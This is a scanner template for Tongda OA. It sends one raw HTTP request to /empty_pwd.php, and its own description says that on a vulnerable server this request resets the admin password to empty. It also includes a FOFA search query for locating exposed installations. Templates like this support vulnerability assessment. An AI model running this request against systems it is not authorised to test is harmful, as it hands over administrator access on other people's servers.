http:
    - matchers:
        - dsl:
            - status_code == 200 && contains((body_1), 'admin密码初始化成功')
          type: dsl
      raw:
        - "GET /empty_pwd.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 \n"
id: tongda-oa-empty-pwd-password-reset-password
info:
    author: xy
    description: 通达OA如果存在/empty_pwd.php文件，访问会将admin的密码重置为空
    metadata:
        fofa-query: app="TDXK-通达OA"
        veified: true
    name: tongda-oa-empty-pwd-password-reset-password
    reference:
        - https://blog.51cto.com/hznethome/2443199
    severity: high
    tags:
        - tongda
        - reset-password
        - 通达oa
        - TDXK-通达OA
